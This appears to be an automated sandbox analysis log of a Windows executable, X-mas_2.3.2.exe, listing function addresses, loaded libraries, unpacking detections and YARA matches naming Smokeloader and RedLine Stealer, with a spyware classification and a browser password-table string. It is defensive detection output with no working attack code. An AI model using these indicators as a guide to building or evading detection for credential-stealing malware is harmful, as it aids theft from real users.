Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00408640	0_2_00408640
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0040D6F8	0_2_0040D6F8
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0042BE8A	0_2_0042BE8A
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00429040	0_2_00429040
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00438040	0_2_00438040
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0042A050	0_2_0042A050
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00425850	0_2_00425850
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00432800	0_2_00432800
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00419820	0_2_00419820
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043F0CB	0_2_0043F0CB
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004038D0	0_2_004038D0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004058E0	0_2_004058E0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004308E0	0_2_004308E0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004088F0	0_2_004088F0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0040D0FF	0_2_0040D0FF
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00415882	0_2_00415882
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0040A8A0	0_2_0040A8A0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004390A0	0_2_004390A0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00409140	0_2_00409140
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0041D940	0_2_0041D940
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00416148	0_2_00416148
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00406160	0_2_00406160
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00433960	0_2_00433960
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0042F166	0_2_0042F166
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00415966	0_2_00415966
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00424974	0_2_00424974
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00440130	0_2_00440130
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004229CD	0_2_004229CD
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004111E9	0_2_004111E9
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043C1B0	0_2_0043C1B0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043F1B0	0_2_0043F1B0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00427A5A	0_2_00427A5A
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0041D260	0_2_0041D260
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00423A60	0_2_00423A60
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0042C26C	0_2_0042C26C
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0042CA35	0_2_0042CA35
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0042CAF1	0_2_0042CAF1
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043F2F6	0_2_0043F2F6
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00404280	0_2_00404280
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0042C282	0_2_0042C282
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043EA80	0_2_0043EA80
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00426340	0_2_00426340
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0042CB4C	0_2_0042CB4C
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00426360	0_2_00426360
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0041AB00	0_2_0041AB00
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00437300	0_2_00437300
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00427B08	0_2_00427B08
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00432B10	0_2_00432B10
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043F330	0_2_0043F330
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00404BC0	0_2_00404BC0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004073C0	0_2_004073C0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043F3C0	0_2_0043F3C0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0041C3CC	0_2_0041C3CC
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004393D0	0_2_004393D0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00423BE0	0_2_00423BE0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0040EB80	0_2_0040EB80
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0042238D	0_2_0042238D
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043F450	0_2_0043F450
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00439C70	0_2_00439C70
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0042847D	0_2_0042847D
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00421C80	0_2_00421C80
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0041DC90	0_2_0041DC90
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004274A5	0_2_004274A5
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00427CB0	0_2_00427CB0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00436554	0_2_00436554
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00432D70	0_2_00432D70
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0040ED75	0_2_0040ED75
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043150E	0_2_0043150E
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043C510	0_2_0043C510
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0041D530	0_2_0041D530
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00414DC0	0_2_00414DC0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00437DE0	0_2_00437DE0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004065F0	0_2_004065F0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0042FDF9	0_2_0042FDF9
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0040AD90	0_2_0040AD90
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00405DA0	0_2_00405DA0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00436DB2	0_2_00436DB2
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0041FE7C	0_2_0041FE7C
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043FE20	0_2_0043FE20
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00402ED0	0_2_00402ED0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0040C6F0	0_2_0040C6F0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0041DE90	0_2_0041DE90
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00418740	0_2_00418740
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00428F6C	0_2_00428F6C
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00414777	0_2_00414777
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_004237D0	0_2_004237D0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00417FE1	0_2_00417FE1
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0041EFE0	0_2_0041EFE0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00416F8D	0_2_00416F8D
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0042F7BC	0_2_0042F7BC
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020FF247	0_2_020FF247
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02106267	0_2_02106267
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_021182A7	0_2_021182A7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_021012C7	0_2_021012C7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02120397	0_2_02120397
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E93A7	0_2_020E93A7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E63C7	0_2_020E63C7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0210F3CD	0_2_0210F3CD
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02117019	0_2_02117019
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E6007	0_2_020E6007
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02118047	0_2_02118047
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02110060	0_2_02110060
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02120087	0_2_02120087
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0210C0F1	0_2_0210C0F1
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_021000E3	0_2_021000E3
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020FE0F7	0_2_020FE0F7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E3137	0_2_020E3137
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02119637	0_2_02119637
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E7627	0_2_020E7627
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020F7648	0_2_020F7648
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_021206E7	0_2_021206E7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02118757	0_2_02118757
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02111775	0_2_02111775
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0211C777	0_2_0211C777
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020FD797	0_2_020FD797
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020F67AF	0_2_020F67AF
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_021167BB	0_2_021167BB
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0211C417	0_2_0211C417
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020F6417	0_2_020F6417
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020F1450	0_2_020F1450
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0210C4D3	0_2_0210C4D3
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020FD4C7	0_2_020FD4C7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E44E7	0_2_020E44E7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0210C4E9	0_2_0210C4E9
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02117567	0_2_02117567
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0210FA23	0_2_0210FA23
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02112A67	0_2_02112A67
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020F6A8D	0_2_020F6A8D
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020F9A87	0_2_020F9A87
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020F7ADB	0_2_020F7ADB
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02118AC7	0_2_02118AC7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02102AE4	0_2_02102AE4
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020EAB07	0_2_020EAB07
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E3B37	0_2_020E3B37
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E5B47	0_2_020E5B47
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02110B47	0_2_02110B47
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E8B57	0_2_020E8B57
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020FDBA7	0_2_020FDBA7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020F5BCD	0_2_020F5BCD
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02113BC7	0_2_02113BC7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E9807	0_2_020E9807
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0211F837	0_2_0211F837
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E6857	0_2_020E6857
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E88A7	0_2_020E88A7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020ED95F	0_2_020ED95F
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020EC957	0_2_020EC957
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020F49DC	0_2_020F49DC
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020E4E27	0_2_020E4E27
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02101EE7	0_2_02101EE7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020FDEF7	0_2_020FDEF7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0211BF47	0_2_0211BF47
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02108F76	0_2_02108F76
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02112FD7	0_2_02112FD7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020EEFDC	0_2_020EEFDC
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0210CC9C	0_2_0210CC9C
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0211ECE7	0_2_0211ECE7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0210CD58	0_2_0210CD58
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02112D77	0_2_02112D77
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020FAD67	0_2_020FAD67
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0210CDB3	0_2_0210CDB3
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_020EEDE7	0_2_020EEDE7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0211FDE7	0_2_0211FDE7

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: String function: 020F4377 appears 82 times
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: String function: 00407EE0 appears 45 times
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: String function: 020E8147 appears 76 times
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: String function: 00414110 appears 82 times

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 1900

Source: X-mas_2.3.2.exe, 00000000.00000003.2278756433.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenames vs X-mas_2.3.2.exe
Source: X-mas_2.3.2.exe, 00000000.00000003.2278590406.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenames vs X-mas_2.3.2.exe
Source: X-mas_2.3.2.exe, 00000000.00000000.2013511626.0000000000451000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesDefenca2 vs X-mas_2.3.2.exe
Source: X-mas_2.3.2.exe	Binary or memory string: OriginalFilenamesDefenca2 vs X-mas_2.3.2.exe

Source: X-mas_2.3.2.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2578235069.0000000000510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: X-mas_2.3.2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@2/1

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Code function: 0_2_005107A6 CreateToolhelp32Snapshot,Module32First,

0_2_005107A6

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Code function: 0_2_00438860 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_00438860

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3140

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\62c4013a-b860-4fb8-bb71-d74b9c165f97

Jump to behavior

Source: X-mas_2.3.2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: X-mas_2.3.2.exe, 00000000.00000003.2280209803.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279904673.0000000002E45000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: X-mas_2.3.2.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

File read: C:\Users\user\Desktop\X-mas_2.3.2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\X-mas_2.3.2.exe "C:\Users\user\Desktop\X-mas_2.3.2.exe"
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 1900

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Unpacked PE file: 0.2.X-mas_2.3.2.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Unpacked PE file: 0.2.X-mas_2.3.2.exe.400000.0.unpack

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0043F000 push eax; mov dword ptr [esp], 5B5A5908h	0_2_0043F005
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_00445408 push ebp; ret	0_2_00445409
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0044866F pushfd ; retf	0_2_00448677
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_005133E9 push ebp; ret	0_2_005133EC
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_0211F267 push eax; mov dword ptr [esp], 5B5A5908h	0_2_0211F26C
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 0_2_02123A6F push ebp; ret	0_2_02123A70

Source: X-mas_2.3.2.exe

Static PE information: section name: .text entropy: 7.756862705834383

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
